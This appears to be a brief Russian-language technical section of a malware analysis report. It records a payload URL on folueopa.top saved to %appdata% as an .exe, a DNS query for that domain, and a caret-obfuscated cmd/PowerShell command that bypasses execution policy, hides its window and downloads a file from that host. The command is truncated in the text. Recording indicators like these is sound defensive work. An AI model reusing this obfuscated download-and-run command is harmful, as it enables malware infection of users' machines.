Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWe^rs^heL^L.EXE -EX^e^cu^tIonpOli^c^Y ByPasS^ -N^oP^RoFIl^e -WI^N^dO^wstY^lE^ HIdD^E^n (NEw-O^bj^E^c^t SY^St^e^m.NeT.weB^c^liE^NT).^D^oW^nLoADFI^Le('http://folueopa.top/rea...
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /c "POWe^rs^heL^L.EXE -EX^e^cu^tIonpOli^c^Y ByPasS^ -N^oP^RoFIl^e -WI^N^dO^wstY^lE^ HIdD^E^n (NEw-O^bj^E^c^t SY^St^e^m.NeT.weB^c^liE^NT).^D^oW^nLoADFI^Le('http://folueopa.top/rea...' (со скрытым окном)